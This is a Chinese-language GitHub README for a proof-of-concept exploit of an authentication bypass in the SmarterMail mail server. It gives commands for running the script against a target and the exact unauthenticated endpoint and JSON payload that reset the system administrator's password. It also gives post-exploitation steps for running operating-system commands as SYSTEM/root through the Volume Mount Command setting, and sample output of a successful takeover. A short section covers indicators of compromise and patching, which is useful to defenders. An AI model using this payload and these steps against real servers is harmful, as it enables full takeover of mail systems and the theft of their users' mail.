g0vguy/WT-2026-0001

# SmarterMail WT-2026-0001 认证绕过漏洞利用 ## 📌 概述 本仓库包含 **CVE-WT-2026-0001** 的概念验证漏洞利用代码，这是 SmarterTools SmarterMail 邮件服务器中的一个严重认证绕过漏洞。该漏洞允许未经认证的攻击者在无需任何事先认证的情况下重置系统管理员密码，进而可能导致远程代码执行 (RCE)。 ## 🔥 漏洞详情 - **CVE ID**: WT-2026-0001 (CVE 待定) - **受影响版本**: SmarterMail **9511 之前** 的版本 - **补丁日期**: 2026 年 1 月 15 日 - **严重程度**: 严重 (CVSS 评分可能为 9.0+) - **攻击载体**: 网络，无需认证 - **影响**: 管理员账户接管 → 系统完全沦陷 ## 🚀 安装 ### 前置条件 - Python 3.6 或更高版本 - `requests` 库 ### 快速设置 ``` # Clone 仓库 git clone https://github.com/g0vguy/WT-2026-0001.git cd WT-2026-0001 # 安装依赖 pip install requests ``` ## 💻 使用 ### 基本漏洞利用 ``` python3 exploit.py https://mail.target.com:9998 ``` ### 高级选项 ``` # 指定自定义管理员用户名 python3 exploit.py https://mail.target.com:9998 -u administrator # 设置自定义新密码 python3 exploit.py https://mail.target.com:9998 -p "MyNewP@ssw0rd123!" # 在不利用的情况下检查漏洞 python3 exploit.py https://mail.target.com:9998 --check-only # 所有选项组合 python3 exploit.py https://mail.target.com:9998 -u admin -p "P@ssw0rd!" --check-only ``` ## 🔍 工作原理 ### 1. 漏洞检查 脚本首先发送一个测试 payload 以确定目标是否存在漏洞。它会检查： - HTTP 200 响应且包含 `"success": true` → **存在漏洞** - HTTP 400 响应且包含 `"Invalid input parameters"` → **已修补** - 其他响应 → **未知/无法访问** ### 2. 漏洞利用 如果存在漏洞，脚本将发送利用 payload： ``` { "IsSysAdmin": "true", "OldPassword": "anything", "Username": "admin", "NewPassword": "Hacked123!@#", "ConfirmPassword": "Hacked123!@#" } ``` ### 3. 成功指标 成功的漏洞利用将返回： ``` { "success": true, "debugInfo": "check1\\r\\ncheck2\\r\\n...check8.2\\r\\n", "resultCode": 200 } ``` ## 🎯 后渗透阶段 成功重置密码后： 1. **登录管理面板**: `https://target:9998/login.aspx` 2. **导航至**: Settings → Volume Mounts 3. **利用内置 RCE**: 使用 "Volume Mount Command" 字段执行操作系统命令 4. **实现完全控制**: 命令以 SYSTEM/root 权限运行 ## 🛡️ 检测与缓解 ### 入侵指标 - `POST /api/v1/auth/force-reset-password` 且包含 `IsSysAdmin: true` - 意外的管理员密码更改 - 日志中出现新的 Volume Mount 条目 - 未授权的系统命令执行 ### 修补 **需立即采取行动**: 升级至 SmarterMail **9511 或更高版本** (2026 年 1 月 15 日发布)。 ### 变通方案 (若修补延迟) 1. 在防火墙/WAF 处阻止对 `/api/v1/auth/force-reset-password` 的访问 2. 对管理界面实施 IP 白名单策略 3. 密切监控管理员账户活动 ## 📊 示例输出 ### 成功漏洞利用 ``` [+] Target appears VULNERABLE [*] Proceeding with exploitation... [*] Targeting: https://mail.victim.com:9998 [*] Admin user: admin [*] New password: Hacked123!@# [*] Sending exploit payload... Endpoint: POST /api/v1/auth/force-reset-password Payload: { "IsSysAdmin": "true", "OldPassword": "anything_can_go_here", "Username": "admin", "NewPassword": "Hacked123!@#", "ConfirmPassword": "Hacked123!@#" } [*] Response Status: 200 [*] Response Body: { "username": "", "errorCode": "", "errorData": "", "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n", "success": true, "resultCode": 200 } [+] EXPLOIT SUCCESSFUL! [+] Admin password has been changed [+] Username: admin [+] New Password: Hacked123!@# [+] Next steps: 1. Login to https://mail.victim.com:9998/login.aspx 2. Navigate to Settings -> Volume Mounts 3. Use 'Volume Mount Command' for RCE [*] Attempting to verify credentials... [*] Manual verification required: 1. Visit https://mail.victim.com:9998/login.aspx 2. Username: admin 3. Password: Hacked123!@# ``` ### 已修补系统 ``` [-] Target appears PATCHED (post-9511) [-] This exploit only works on versions before 9511 ``` **免责声明**: 维护者不对本工具的滥用负责。请仅用于授权的安全测试和教育目的。

标签：CVE-2026, PoC, Python, Python脚本, SmarterMail, 安全漏洞, 无后门, 暴力破解, 未授权访问, 管理员密码重置, 系统提权, 编程工具, 网络安全, 认证绕过, 远程代码执行, 逆向工具, 邮件服务器, 隐私保护